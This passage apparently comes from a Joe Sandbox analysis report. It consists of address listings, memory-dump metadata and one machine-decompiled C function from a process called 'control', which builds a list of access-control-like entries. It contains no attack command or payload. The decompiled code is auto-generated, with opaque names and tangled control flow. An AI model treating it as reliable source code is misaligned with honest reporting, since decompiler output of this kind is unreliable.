0x04d16711
0x04d16713
0x04d16764
0x04d1676a
0x04d1676d
0x04d16771
0x04d16773
0x04d1677a
0x04d1678c
0x04d16791
0x04d16794
0x04d1679a
0x04d1679a
0x00000000
0x04d16771
0x04d16715
0x04d16718
0x04d1671e
0x04cc2869
0x04cc286b
0x00000000
0x04cc2871
0x04cc2871
0x04cc2874
0x04cc2878
0x04d16746
0x04d1674e
0x04d16754
0x04d16757
0x04d1675c
0x04d1675c
0x00000000
0x04cc2878
0x04cc286b
0x04d16729
0x04d1672e
0x04d16732
0x04d16732
0x04cc2866
0x04cc2866
0x00000000
0x04cc2866
0x04cc281a
0x04cc2893
0x04cc2897
0x04cc289a
0x04cc28a3
0x04cc28a3
0x04cc28a3
0x04cc28a5
0x04cc28a9
0x00000000
0x04cc28ab
0x04cc28ab
0x04cc28ad
0x04cc28af
0x04cc28b1
0x04cc28b2
0x00000000
0x04cc28b2
0x04cc281c
0x04cc281c
0x04cc281e
0x04cc2820
0x04cc2822
0x04cc2823
0x04cc2828
0x04cc2828
0x04cc282a
0x04cc282f
0x00000000
0x04cc282f
0x04cc281a
0x04cc27f0
0x04cc27f6
0x04cc27fa
0x04d16370
0x04d16370
0x04d16373
0x04d16375
0x00000000
0x00000000
0x04d1637b
0x04d16381
0x04d16383
0x04d1638e
0x04d16390
0x04d16395
0x04d16395
0x00000000
0x04d16383
0x04cc2800
0x04cc2807
0x00000000
0x00000000
0x00000000
0x04cc2807

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1e64fc43961a479f212571ee146a5fa33207371ba3b44df59782938001e942
Instruction ID: f932ec835d98e4dd69d7c5f6f4a7a5315d454c35448eaa51c0e774240cf2ba97
Opcode Fuzzy Hash: fe1e64fc43961a479f212571ee146a5fa33207371ba3b44df59782938001e942
Instruction Fuzzy Hash: 7E32CB30A04754ABDB24CF69D8547BABBF2FF84704F24815DE8869B6A4E734F842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8CDF Relevance: .6, Instructions: 554
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04CD8CDF(signed int __ecx, signed char* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr* _a20, signed int* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				signed char* _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				intOrPtr _t227;
				signed int _t230;
				signed int _t235;
				signed int _t240;
				signed short _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed short _t247;
				signed int _t249;
				signed short _t252;
				signed int _t254;
				signed short _t258;
				signed short _t264;
				intOrPtr _t268;
				signed short _t269;
				signed int _t280;
				signed int _t286;
				signed int _t292;
				signed int _t298;
				signed int _t304;
				intOrPtr _t305;
				signed int _t307;
				signed int _t312;
				signed char* _t316;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed char* _t330;
				signed char* _t331;
				signed char* _t332;
				signed char* _t333;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed short _t341;
				signed int _t342;
				intOrPtr _t344;
				signed short _t345;
				signed short _t346;
				signed short _t347;
				signed int _t348;
				signed short _t349;
				signed short _t350;
				signed char* _t359;
				signed char* _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				intOrPtr _t378;
				signed int _t381;
				char* _t382;
				char* _t383;
				char* _t384;
				char* _t385;
				char* _t386;
				intOrPtr* _t387;
				signed int* _t388;
				signed int _t389;
				void* _t390;

				_t218 = __ecx;
				_v12 = 2;
				_t381 = 0;
				_v20 = __ecx;
				_v40 = 0;
				_t316 = __edx;
				_v24 = __edx;
				_v16 = 0;
				_v36 = 0;
				if(__ecx != 0 || __edx != 0 || _a4 != 0 || _a8 != 0 || _a12 != 0 || _a16 != 0) {
					_t388 = _a24;
					_v8 = 8;
					__eflags = _t218;
					if(_t218 != 0) {
						_t363 = _t381;
						_t329 = _t218 + 8;
						_t381 = 0;
						_v28 = _t363;
						_v32 = _t329;
						__eflags = 0 -  *((intOrPtr*)(_t218 + 4));
						if(0 >=  *((intOrPtr*)(_t218 + 4))) {
							goto L9;
						}
						do {
							_t305 =  *_t329;
							__eflags = _t305 - 2;
							if(_t305 < 2) {
								goto L75;
							}
							__eflags = _t305 - 3;
							if(_t305 <= 3) {
								L70:
								_t321 = E04CA94A3(_v8,  *(_t329 + 2) & 0x0000ffff,  &_v8);
								__eflags = _t321;
								if(_t321 < 0) {
									L39:
									 *_a20 = _v16;
									return _t321;
								}
								__eflags = _t388;
								if(_t388 != 0) {
									 *_t388 =  *_t388 | 0x00000008;
									__eflags =  *_t388;
								}
								_t329 = _v32;
								_t363 = _v28;
								_t312 =  *_v20 & 0x000000ff;
								__eflags = _t312 - _v12;
								if(_t312 > _v12) {
									_v12 = _t312;
								}
								goto L75;
							}
							__eflags = _t305 - 6;
							if(_t305 <= 6) {
								goto L75;
							}
							__eflags = _t305 - 8;
							if(_t305 <= 8) {
								goto L70;
							}
							__eflags = _t305 - 0xd - 3;
							if(_t305 - 0xd > 3) {
								goto L75;
							}
							goto L70;
							L75:
							_t363 = _t363 + 1;
							_t329 = _t329 + ( *(_t329 + 2) & 0x0000ffff);
							_v28 = _t363;
							_t307 = _v20;
							_v32 = _t329;
							__eflags = _t363 - ( *(_t307 + 4) & 0x0000ffff);
						} while (_t363 < ( *(_t307 + 4) & 0x0000ffff));
						_t316 = _v24;
					}
					L9:
					__eflags = _t316;
					if(_t316 == 0) {
						L18:
						_t219 = _a12;
						__eflags = _t219;
						if(_t219 != 0) {
							_t330 = _t219 + 8;
							__eflags = 0 -  *((intOrPtr*)(_t219 + 4));
							_t364 = _t381;
							while(1) {
								_v28 = _t330;
								_v32 = _t364;
								if(__eflags >= 0) {
									goto L19;
								}
								__eflags =  *_t330 - 0x14;
								if( *_t330 != 0x14) {
									L84:
									_t364 = _t364 + 1;
									_t330 = _t330 + ( *(_t330 + 2) & 0x0000ffff);
									__eflags = _t364 - ( *(_a12 + 4) & 0x0000ffff);
									continue;
								} else {
									_t321 = E04CA94A3(_v8,  *(_t330 + 2) & 0x0000ffff,  &_v8);
									__eflags = _t321;
									if(_t321 < 0) {
										goto L39;
									}
									__eflags = _t388;
									if(_t388 != 0) {
										 *_t388 =  *_t388 | 0x00000080;
										__eflags =  *_t388;
									}
									_t364 = _v32;
									_t298 =  *_a12 & 0x000000ff;
									_t330 = _v28;
									__eflags = _t298 - _v12;
									if(_t298 > _v12) {
										_v12 = _t298;
									}
									goto L84;
								}
								L45:
								_t331 = _t220 + 8;
								__eflags = 0 -  *((intOrPtr*)(_t220 + 4));
								_t365 = _t381;
								while(1) {
									_v28 = _t331;
									_v32 = _t365;
									if(__eflags >= 0) {
										break;
									}
									__eflags =  *_t331 - 0x15;
									if( *_t331 != 0x15) {
										L91:
										_t365 = _t365 + 1;
										_t331 = _t331 + ( *(_t331 + 2) & 0x0000ffff);
										__eflags = _t365 - ( *(_a16 + 4) & 0x0000ffff);
										continue;
									} else {
										_t321 = E04CA94A3(_v8,  *(_t331 + 2) & 0x0000ffff,  &_v8);
										__eflags = _t321;
										if(_t321 < 0) {
											goto L39;
										}
										__eflags = _t388;
										if(_t388 != 0) {
											 *_t388 =  *_t388 | 0x00000100;
											__eflags =  *_t388;
										}
										_t365 = _v32;
										_t292 =  *_a16 & 0x000000ff;
										_t331 = _v28;
										__eflags = _t292 - _v12;
										if(_t292 > _v12) {
											_v12 = _t292;
										}
										goto L91;
									}
									L48:
									_t78 = _t221 + 8; // 0xa
									_t332 = _t78;
									__eflags = 0 -  *((intOrPtr*)(_t221 + 4));
									_t366 = _t381;
									while(1) {
										_v28 = _t332;
										_v32 = _t366;
										if(__eflags >= 0) {
											break;
										}
										__eflags =  *_t332 - 0x12;
										if( *_t332 != 0x12) {
											L98:
											_t366 = _t366 + 1;
											_t332 = _t332 + ( *(_t332 + 2) & 0x0000ffff);
											__eflags = _t366 - ( *(_a4 + 4) & 0x0000ffff);
											continue;
										} else {
											_t321 = E04CA94A3(_v8,  *(_t332 + 2) & 0x0000ffff,  &_v8);
											__eflags = _t321;
											if(_t321 < 0) {
												goto L39;
											}
											__eflags = _t388;
											if(_t388 != 0) {
												 *_t388 =  *_t388 | 0x00000020;
												__eflags =  *_t388;
											}
											_t366 = _v32;
											_t286 =  *_a4 & 0x000000ff;
											_t332 = _v28;
											__eflags = _t286 - _v12;
											if(_t286 > _v12) {
												_v12 = _t286;
											}
											goto L98;
										}
										L51:
										_t333 = _t222 + 8;
										__eflags = 0 -  *((intOrPtr*)(_t222 + 4));
										_t367 = _t381;
										while(1) {
											_v28 = _t333;
											_v32 = _t367;
											if(__eflags >= 0) {
												break;
											}
											__eflags =  *_t333 - 0x13;
											if( *_t333 != 0x13) {
												L105:
												_t367 = _t367 + 1;
												_t333 = _t333 + ( *(_t333 + 2) & 0x0000ffff);
												__eflags = _t367 - ( *(_a8 + 4) & 0x0000ffff);
												continue;
											} else {
												_t321 = E04CA94A3(_v8,  *(_t333 + 2) & 0x0000ffff,  &_v8);
												__eflags = _t321;
												if(_t321 < 0) {
													goto L39;
												}
												__eflags = _t388;
												if(_t388 != 0) {
													 *_t388 =  *_t388 | 0x00000040;
													__eflags =  *_t388;
												}
												_t367 = _v32;
												_t280 =  *_a8 & 0x000000ff;
												_t333 = _v28;
												__eflags = _t280 - _v12;
												if(_t280 > _v12) {
													_v12 = _t280;
												}
												goto L105;
											}
											L54:
											_t338 = _t381;
											_v28 = _t369 + 8;
											_v32 = _t338;
											__eflags = 0 -  *(_t369 + 4);
											if(0 >=  *(_t369 + 4)) {
												L27:
												_t389 = _v36;
												L28:
												_t370 = _v24;
												__eflags = _t370;
												if(_t370 == 0) {
													L35:
													_t371 = _a12;
													__eflags = _t371;
													if(_t371 != 0) {
														_t339 = _t381;
														_v32 = _t371 + 8;
														_v36 = _t339;
														__eflags = 0 -  *(_t371 + 4);
														if(0 >=  *(_t371 + 4)) {
															goto L36;
														}
														_t385 = _v32;
														_t325 = _v16;
														do {
															__eflags =  *_t385 - 0x14;
															_t258 =  *(_t385 + 2) & 0x0000ffff;
															if( *_t385 == 0x14) {
																E04CF88C0(_t389, _t385, _t258);
																_t371 = _a12;
																_t390 = _t390 + 0xc;
																 *((short*)(_t325 + 4)) =  *((short*)(_t325 + 4)) + 1;
																_t347 =  *(_t385 + 2) & 0x0000ffff;
																_t389 = _t389 + _t347;
																__eflags = _t389;
																_t258 = _t347;
																_t339 = _v36;
															}
															_t339 = _t339 + 1;
															_t385 = _t385 + (_t258 & 0x0000ffff);
															_v36 = _t339;
															__eflags = _t339 - ( *(_t371 + 4) & 0x0000ffff);
														} while (_t339 < ( *(_t371 + 4) & 0x0000ffff));
														_t321 = _v12;
														_t381 = 0;
													}
													L36:
													_t240 = _a16;
													__eflags = _t240;
													if(_t240 != 0) {
														_t340 = _t381;
														_t382 = _t240 + 8;
														_v36 = _t340;
														__eflags = 0 -  *((intOrPtr*)(_t240 + 4));
														if(0 <  *((intOrPtr*)(_t240 + 4))) {
															_t322 = _v16;
															do {
																__eflags =  *_t382 - 0x15;
																_t241 =  *(_t382 + 2) & 0x0000ffff;
																if( *_t382 == 0x15) {
																	E04CF88C0(_t389, _t382, _t241);
																	_t390 = _t390 + 0xc;
																	 *((short*)(_t322 + 4)) =  *((short*)(_t322 + 4)) + 1;
																	_t341 =  *(_t382 + 2) & 0x0000ffff;
																	_t389 = _t389 + _t341;
																	__eflags = _t389;
																	_t241 = _t341;
																	_t340 = _v36;
																}
																_t340 = _t340 + 1;
																_t382 = _t382 + (_t241 & 0x0000ffff);
																_v36 = _t340;
																_t243 = _a16;
																__eflags = _t340 - ( *(_t243 + 4) & 0x0000ffff);
															} while (_t340 < ( *(_t243 + 4) & 0x0000ffff));
															_t321 = _v12;
														}
														_t381 = 0;
													}
													_t245 = _a4;
													__eflags = _t245;
													if(_t245 != 0) {
														_t342 = _t381;
														_t97 = _t245 + 8; // 0xa
														_t383 = _t97;
														_v36 = _t342;
														__eflags = 0 -  *((intOrPtr*)(_t245 + 4));
														if(0 >=  *((intOrPtr*)(_t245 + 4))) {
															goto L38;
														}
														_t324 = _v16;
														do {
															__eflags =  *_t383 - 0x12;
															_t252 =  *(_t383 + 2) & 0x0000ffff;
															if( *_t383 == 0x12) {
																E04CF88C0(_t389, _t383, _t252);
																_t390 = _t390 + 0xc;
																 *((short*)(_t324 + 4)) =  *((short*)(_t324 + 4)) + 1;
																_t346 =  *(_t383 + 2) & 0x0000ffff;
																_t389 = _t389 + _t346;
																__eflags = _t389;
																_t252 = _t346;
																_t342 = _v36;
															}
															_t342 = _t342 + 1;
															_t383 = _t383 + (_t252 & 0x0000ffff);
															_v36 = _t342;
															_t254 = _a4;
															__eflags = _t342 - ( *(_t254 + 4) & 0x0000ffff);
														} while (_t342 < ( *(_t254 + 4) & 0x0000ffff));
														_t321 = _v12;
													}
													L38:
													_t246 = _a8;
													__eflags = _t246;
													if(_t246 != 0) {
														_t384 = _t246 + 8;
														__eflags = 0 -  *((intOrPtr*)(_t246 + 4));
														if(0 >=  *((intOrPtr*)(_t246 + 4))) {
															goto L39;
														}
														_t323 = _v16;
														_t344 = 0;
														__eflags = 0;
														do {
															__eflags =  *_t384 - 0x13;
															_t247 =  *(_t384 + 2) & 0x0000ffff;
															if( *_t384 == 0x13) {
																E04CF88C0(_t389, _t384, _t247);
																_t390 = _t390 + 0xc;
																 *((short*)(_t323 + 4)) =  *((short*)(_t323 + 4)) + 1;
																_t345 =  *(_t384 + 2) & 0x0000ffff;
																_t389 = _t389 + _t345;
																__eflags = _t389;
																_t247 = _t345;
																_t344 = _v40;
															}
															_t344 = _t344 + 1;
															_t384 = _t384 + (_t247 & 0x0000ffff);
															_v40 = _t344;
															_t249 = _a8;
															__eflags = _t344 - ( *(_t249 + 4) & 0x0000ffff);
														} while (_t344 < ( *(_t249 + 4) & 0x0000ffff));
														_t321 = _v12;
													}
													goto L39;
												}
												_t348 = _t381;
												_v32 = _t370 + 8;
												_v36 = _t348;
												__eflags = 0 -  *(_t370 + 4);
												if(0 >=  *(_t370 + 4)) {
													goto L35;
												}
												_t386 = _v32;
												_t326 = _v16;
												do {
													__eflags =  *_t386 - 0x11;
													_t264 =  *(_t386 + 2) & 0x0000ffff;
													if( *_t386 == 0x11) {
														E04CF88C0(_t389, _t386, _t264);
														_t370 = _v24;
														_t390 = _t390 + 0xc;
														 *((short*)(_t326 + 4)) =  *((short*)(_t326 + 4)) + 1;
														_t349 =  *(_t386 + 2) & 0x0000ffff;
														_t389 = _t389 + _t349;
														__eflags = _t389;
														_t264 = _t349;
														_t348 = _v36;
													}
													_t348 = _t348 + 1;
													_t386 = _t386 + (_t264 & 0x0000ffff);
													_v36 = _t348;
													__eflags = _t348 - ( *(_t370 + 4) & 0x0000ffff);
												} while (_t348 < ( *(_t370 + 4) & 0x0000ffff));
												_t321 = _v12;
												_t381 = 0;
												__eflags = 0;
												goto L35;
											}
											_t389 = _v36;
											_t387 = _v28;
											_t327 = _v16;
											do {
												_t268 =  *_t387;
												__eflags = _t268 - 2;
												if(_t268 < 2) {
													L116:
													_t269 =  *(_t387 + 2) & 0x0000ffff;
													goto L117;
												}
												__eflags = _t268 - 3;
												if(_t268 <= 3) {
													L115:
													E04CF88C0(_t389, _t387,  *(_t387 + 2) & 0x0000ffff);
													_t369 = _v20;
													_t390 = _t390 + 0xc;
													 *((short*)(_t327 + 4)) =  *((short*)(_t327 + 4)) + 1;
													_t350 =  *(_t387 + 2) & 0x0000ffff;
													_t389 = _t389 + _t350;
													_t269 = _t350;
													_t338 = _v32;
													goto L117;
												}
												__eflags = _t268 - 6;
												if(_t268 <= 6) {
													goto L116;
												}
												__eflags = _t268 - 8;
												if(_t268 <= 8) {
													goto L115;
												}
												__eflags = _t268 - 0xd - 3;
												if(_t268 - 0xd > 3) {
													goto L116;
												}
												goto L115;
												L117:
												_t338 = _t338 + 1;
												_t387 = _t387 + (_t269 & 0x0000ffff);
												_v32 = _t338;
												__eflags = _t338 - ( *(_t369 + 4) & 0x0000ffff);
											} while (_t338 < ( *(_t369 + 4) & 0x0000ffff));
											_t321 = _v12;
											_t381 = 0;
											goto L28;
										}
										L22:
										_push( &_v8);
										_t368 = 3;
										_t321 = E04CA94A3(_v8, _t368);
										__eflags = _t321;
										if(_t321 < 0) {
											goto L39;
										}
										_t227 =  *0x4da5d78; // 0x0
										_t337 = _v8 & 0xfffffffc;
										_v8 = _v8 & 0xfffffffc;
										_t230 = E04CC5D90(_v8 & 0xfffffffc,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t227 + 0x140000, _t337);
										_v16 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											_t321 = 0xc0000017;
											goto L39;
										}
										_t321 = E04CD7C20(_t230, _v8, _v12);
										_v12 = _t321;
										__eflags = _t321;
										if(_t321 < 0) {
											L108:
											E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t381, _v16);
											_v16 = _t381;
											goto L39;
										}
										_t235 = E04CD7F70(_t337, _v16,  &_v36);
										__eflags = _t235;
										if(_t235 == 0) {
											_t321 = 0xc000007d;
											goto L108;
										}
										_t369 = _v20;
										__eflags = _t369;
										if(_t369 != 0) {
											goto L54;
										}
										goto L27;
									}
									L21:
									_t222 = _a8;
									__eflags = _t222;
									if(_t222 != 0) {
										goto L51;
									}
									goto L22;
								}
								L20:
								_t221 = _a4;
								__eflags = _t221;
								if(_t221 != 0) {
									goto L48;
								}
								goto L21;
							}
						}
						L19:
						_t220 = _a16;
						__eflags = _t220;
						if(_t220 != 0) {
							goto L45;
						}
						goto L20;
					}
					_t14 =  &(_t316[8]); // 0x8
					_t359 = _t14;
					__eflags = 0 - _t316[4];
					_t378 = _t381;
					while(1) {
						_v28 = _t359;
						_v32 = _t378;
						if(__eflags >= 0) {
							goto L18;
						}
						__eflags =  *_t359 - 0x11;
						if( *_t359 != 0x11) {
							L17:
							_t378 = _t378 + 1;
							_t359 =  &(_t359[_t359[2] & 0x0000ffff]);
							__eflags = _t378 - (_t316[4] & 0x0000ffff);
							continue;
						}
						_t321 = E04CA94A3(_v8, _t359[2] & 0x0000ffff,  &_v8);
						__eflags = _t321;
						if(_t321 < 0) {
							goto L39;
						}
						__eflags = _t388;
						if(_t388 != 0) {
							 *_t388 =  *_t388 | 0x00000010;
							__eflags =  *_t388;
						}
						_t316 = _v24;
						_t359 = _v28;
						_t378 = _v32;
						_t304 =  *_t316 & 0x000000ff;
						__eflags = _t304 - _v12;
						if(_t304 > _v12) {
							_v12 = _t304;
						}
						goto L17;
					}
					goto L18;
				} else {
					 *_a20 = 0;
					return 0;
				}
			}

0x04cd8ce9
0x04cd8ceb
0x04cd8cf3
0x04cd8cf5
0x04cd8cf8
0x04cd8cfb
0x04cd8cfd
0x04cd8d00
0x04cd8d03
0x04cd8d08
0x04cd8d30
0x04cd8d33
0x04cd8d3a
0x04cd8d3c
0x04cd8ee8
0x04cd8eea
0x04cd8eed
0x04cd8eef
0x04cd8ef2
0x04cd8ef5
0x04cd8ef9
0x00000000
0x00000000
0x04d1d084
0x04d1d084
0x04d1d086
0x04d1d088
0x00000000
0x00000000
0x04d1d08a
0x04d1d08c
0x04d1d09c
0x04d1d0ac
0x04d1d0ae
0x04d1d0b0
0x04cd8ed9
0x04cd8edf
0x00000000
0x04cd8ee1
0x04d1d0b6
0x04d1d0b8
0x04d1d0ba
0x04d1d0ba
0x04d1d0ba
0x04d1d0c0
0x04d1d0c3
0x04d1d0c6
0x04d1d0c9
0x04d1d0cc
0x04d1d0ce
0x04d1d0ce
0x00000000
0x04d1d0cc
0x04d1d08e
0x04d1d090
0x00000000
0x00000000
0x04d1d092
0x04d1d094
0x00000000
0x00000000
0x04d1d098
0x04d1d09a
0x00000000
0x00000000
0x00000000
0x04d1d0d1
0x04d1d0d5
0x04d1d0d6
0x04d1d0d8
0x04d1d0db
0x04d1d0de
0x04d1d0e5
0x04d1d0e5
0x04d1d0e9
0x04d1d0e9
0x04cd8d42
0x04cd8d42
0x04cd8d44
0x04cd8da3
0x04cd8da3
0x04cd8da6
0x04cd8da8
0x04cd8f06
0x04cd8f09
0x04cd8f0d
0x04cd8f0f
0x04cd8f0f
0x04cd8f12
0x04cd8f15
0x00000000
0x00000000
0x04d1d0f9
0x04d1d0fc
0x04d1d136
0x04d1d13a
0x04d1d13b
0x04d1d144
0x00000000
0x04d1d0fe
0x04d1d10e
0x04d1d110
0x04d1d112
0x00000000
0x00000000
0x04d1d118
0x04d1d11a
0x04d1d11c
0x04d1d11c
0x04d1d11c
0x04d1d125
0x04d1d128
0x04d1d12b
0x04d1d12e
0x04d1d131
0x04d1d133
0x04d1d133
0x00000000
0x04d1d131
0x04cd8f20
0x04cd8f22
0x04cd8f25
0x04cd8f29
0x04cd8f2b
0x04cd8f2b
0x04cd8f2e
0x04cd8f31
0x00000000
0x00000000
0x04d1d14b
0x04d1d14e
0x04d1d188
0x04d1d18c
0x04d1d18d
0x04d1d196
0x00000000
0x04d1d150
0x04d1d160
0x04d1d162
0x04d1d164
0x00000000
0x00000000
0x04d1d16a
0x04d1d16c
0x04d1d16e
0x04d1d16e
0x04d1d16e
0x04d1d177
0x04d1d17a
0x04d1d17d
0x04d1d180
0x04d1d183
0x04d1d185
0x04d1d185
0x00000000
0x04d1d183
0x04cd8f3c
0x04cd8f3e
0x04cd8f3e
0x04cd8f41
0x04cd8f45
0x04cd8f47
0x04cd8f47
0x04cd8f4a
0x04cd8f4d
0x00000000
0x00000000
0x04d1d19d
0x04d1d1a0
0x04d1d1d7
0x04d1d1db
0x04d1d1dc
0x04d1d1e5
0x00000000
0x04d1d1a2
0x04d1d1b2
0x04d1d1b4
0x04d1d1b6
0x00000000
0x00000000
0x04d1d1bc
0x04d1d1be
0x04d1d1c0
0x04d1d1c0
0x04d1d1c0
0x04d1d1c6
0x04d1d1c9
0x04d1d1cc
0x04d1d1cf
0x04d1d1d2
0x04d1d1d4
0x04d1d1d4
0x00000000
0x04d1d1d2
0x04cd8f58
0x04cd8f5a
0x04cd8f5d
0x04cd8f61
0x04cd8f63
0x04cd8f63
0x04cd8f66
0x04cd8f69
0x00000000
0x00000000
0x04d1d1ec
0x04d1d1ef
0x04d1d226
0x04d1d22a
0x04d1d22b
0x04d1d234
0x00000000
0x04d1d1f1
0x04d1d201
0x04d1d203
0x04d1d205
0x00000000
0x00000000
0x04d1d20b
0x04d1d20d
0x04d1d20f
0x04d1d20f
0x04d1d20f
0x04d1d215
0x04d1d218
0x04d1d21b
0x04d1d21e
0x04d1d221
0x04d1d223
0x04d1d223
0x00000000
0x04d1d221
0x04cd8f74
0x04cd8f77
0x04cd8f79
0x04cd8f7e
0x04cd8f81
0x04cd8f85
0x04cd8e4e
0x04cd8e4e
0x04cd8e51
0x04cd8e51
0x04cd8e54
0x04cd8e56
0x04cd8ead
0x04cd8ead
0x04cd8eb0
0x04cd8eb2
0x04cd8f93
0x04cd8f95
0x04cd8f9a
0x04cd8f9d
0x04cd8fa1
0x00000000
0x00000000
0x04d1d2c7
0x04d1d2ca
0x04d1d2cd
0x04d1d2cd
0x04d1d2d0
0x04d1d2d4
0x04d1d2d9
0x04d1d2de
0x04d1d2e1
0x04d1d2e4
0x04d1d2e8
0x04d1d2ec
0x04d1d2ec
0x04d1d2ee
0x04d1d2f0
0x04d1d2f0
0x04d1d2f6
0x04d1d2f7
0x04d1d2f9
0x04d1d300
0x04d1d300
0x04d1d304
0x04d1d307
0x04d1d307
0x04cd8eb8
0x04cd8eb8
0x04cd8ebb
0x04cd8ebd
0x04cd8fac
0x04cd8fb0
0x04cd8fb3
0x04cd8fb6
0x04cd8fba
0x04cd8ff3
0x04d1d30e
0x04d1d30e
0x04d1d311
0x04d1d315
0x04d1d31a
0x04d1d31f
0x04d1d322
0x04d1d326
0x04d1d32a
0x04d1d32a
0x04d1d32c
0x04d1d32e
0x04d1d32e
0x04d1d334
0x04d1d335
0x04d1d337
0x04d1d33a
0x04d1d341
0x04d1d341
0x04d1d345
0x04d1d345
0x04cd8fbc
0x04cd8fbc
0x04cd8ec3
0x04cd8ec6
0x04cd8ec8
0x04cd8fc3
0x04cd8fc7
0x04cd8fc7
0x04cd8fca
0x04cd8fcd
0x04cd8fd1
0x00000000
0x00000000
0x04cd8fd7
0x04d1d34d
0x04d1d34d
0x04d1d350
0x04d1d354
0x04d1d359
0x04d1d35e
0x04d1d361
0x04d1d365
0x04d1d369
0x04d1d369
0x04d1d36b
0x04d1d36d
0x04d1d36d
0x04d1d373
0x04d1d374
0x04d1d376
0x04d1d379
0x04d1d380
0x04d1d380
0x04d1d384
0x04d1d384
0x04cd8ece
0x04cd8ece
0x04cd8ed1
0x04cd8ed3
0x04cd8fe1
0x04cd8fe4
0x04cd8fe8
0x00000000
0x00000000
0x04d1d38c
0x04d1d38f
0x04d1d38f
0x04d1d391
0x04d1d391
0x04d1d394
0x04d1d398
0x04d1d39d
0x04d1d3a2
0x04d1d3a5
0x04d1d3a9
0x04d1d3ad
0x04d1d3ad
0x04d1d3af
0x04d1d3b1
0x04d1d3b1
0x04d1d3b7
0x04d1d3b8
0x04d1d3ba
0x04d1d3bd
0x04d1d3c4
0x04d1d3c4
0x04d1d3c8
0x04d1d3c8
0x00000000
0x04cd8ed3
0x04cd8e5b
0x04cd8e5d
0x04cd8e62
0x04cd8e65
0x04cd8e69
0x00000000
0x00000000
0x04cd8e6b
0x04cd8e6e
0x04cd8e71
0x04cd8e71
0x04cd8e74
0x04cd8e78
0x04cd8e7d
0x04cd8e82
0x04cd8e85
0x04cd8e88
0x04cd8e8c
0x04cd8e90
0x04cd8e90
0x04cd8e92
0x04cd8e94
0x04cd8e94
0x04cd8e9a
0x04cd8e9b
0x04cd8e9d
0x04cd8ea4
0x04cd8ea4
0x04cd8ea8
0x04cd8eab
0x04cd8eab
0x00000000
0x04cd8eab
0x04d1d264
0x04d1d267
0x04d1d26a
0x04d1d26d
0x04d1d26d
0x04d1d26f
0x04d1d271
0x04d1d2a8
0x04d1d2a8
0x00000000
0x04d1d2a8
0x04d1d273
0x04d1d275
0x04d1d285
0x04d1d28c
0x04d1d291
0x04d1d294
0x04d1d297
0x04d1d29b
0x04d1d29f
0x04d1d2a1
0x04d1d2a3
0x00000000
0x04d1d2a3
0x04d1d277
0x04d1d279
0x00000000
0x00000000
0x04d1d27b
0x04d1d27d
0x00000000
0x00000000
0x04d1d281
0x04d1d283
0x00000000
0x00000000
0x00000000
0x04d1d2ac
0x04d1d2af
0x04d1d2b0
0x04d1d2b2
0x04d1d2b9
0x04d1d2b9
0x04d1d2bd
0x04d1d2c0
0x00000000
0x04d1d2c0
0x04cd8dcf
0x04cd8dd5
0x04cd8dd8
0x04cd8dde
0x04cd8de0
0x04cd8de2
0x00000000
0x00000000
0x04cd8deb
0x04cd8df0
0x04cd8df8
0x04cd8e06
0x04cd8e0b
0x04cd8e0e
0x04cd8e10
0x04d1d23b
0x00000000
0x04d1d23b
0x04cd8e22
0x04cd8e24
0x04cd8e27
0x04cd8e29
0x04d1d24a
0x04d1d257
0x04d1d25c
0x00000000
0x04d1d25c
0x04cd8e36
0x04cd8e3b
0x04cd8e3d
0x04d1d245
0x00000000
0x04d1d245
0x04cd8e43
0x04cd8e46
0x04cd8e48
0x00000000
0x00000000
0x00000000
0x04cd8e48
0x04cd8dc4
0x04cd8dc4
0x04cd8dc7
0x04cd8dc9
0x00000000
0x00000000
0x00000000
0x04cd8dc9
0x04cd8db9
0x04cd8db9
0x04cd8dbc
0x04cd8dbe
0x00000000
0x00000000
0x00000000
0x04cd8dbe
0x04cd8f0f
0x04cd8dae
0x04cd8dae
0x04cd8db1
0x04cd8db3
0x00000000
0x00000000
0x00000000
0x04cd8db3
0x04cd8d48
0x04cd8d48
0x04cd8d4b
0x04cd8d4f
0x04cd8d51
0x04cd8d51
0x04cd8d54
0x04cd8d57
0x00000000
0x00000000
0x04cd8d59
0x04cd8d5c
0x04cd8d94
0x04cd8d98
0x04cd8d99
0x04cd8d9f
0x00000000
0x04cd8d9f
0x04cd8d6e
0x04cd8d70
0x04cd8d72
0x00000000
0x00000000
0x04cd8d78
0x04cd8d7a
0x04cd8d7c
0x04cd8d7c
0x04cd8d7c
0x04cd8d7f
0x04cd8d82
0x04cd8d85
0x04cd8d88
0x04cd8d8b
0x04cd8d8e
0x04d1d0f1
0x04d1d0f1
0x00000000
0x04cd8d8e
0x00000000
0x04cd8d22
0x04cd8d25
0x00000000
0x04cd8d27

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
